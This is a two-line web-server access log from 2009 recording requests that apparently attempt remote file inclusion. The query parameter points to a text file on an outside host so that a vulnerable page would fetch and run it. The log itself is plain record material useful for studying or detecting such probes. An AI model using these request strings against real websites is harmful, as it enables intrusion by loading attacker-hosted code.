66.148.120.132 - - [12/Nov/2009:07:30:41 -0600] "GET /logs/access_log.1242864000/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:45 -0600] "GET /logs/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
